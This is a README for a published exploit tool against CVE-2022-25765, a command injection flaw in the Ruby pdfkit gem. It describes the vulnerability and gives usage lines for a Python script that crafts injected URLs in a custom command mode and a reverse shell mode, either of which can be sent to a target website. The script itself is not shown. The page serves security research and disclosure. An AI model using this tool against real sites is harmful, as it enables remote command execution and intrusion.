exploit-CVE-2022-25765
exploit-CVE-2022-25765 copied to clipboard
Exploit for CVE-2022–25765 (pdfkit) - Command Injection
Exploit for CVE-2022–25765 (pdfkit) - Command Injection
Like this repo? Give us a ⭐!
For educational and authorized security research purposes only.
Exploit Author
@UNICORDev by (@NicPWNs and @Dev-Yeoj)
Vulnerability Description
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.
Exploit Description
A ruby gem pdfkit
is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates executable URLs or sends them to a vulnerable website running pdfkit
.
Usage
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
Options
-c Custom command mode. Provide command to generate custom payload with.
-s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
-w URL of website running vulnerable pdfkit. (Optional)
-p POST parameter on website running vulnerable pdfkit. (Optional)
-h Show this help menu.
Download
Download exploit-CVE-2022-25765.py from GitHub
Download exploit-CVE-2022-25765.py from ExploitDB
Searchsploit (ExploitDB)
searchsploit -u
searchsploit -m 51293
Exploit Requirements
- python3
- python3:requests
- python3:urllib3
Demo
Custom Command Mode
Reverse Shell Sent to Target Website Mode
Tested On
pdfkit Version 0.8.6
Applies To
pdfkit Versions < 0.8.7.2
Test Environment
gem install pdfkit -v 0.8.6
Credits
- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795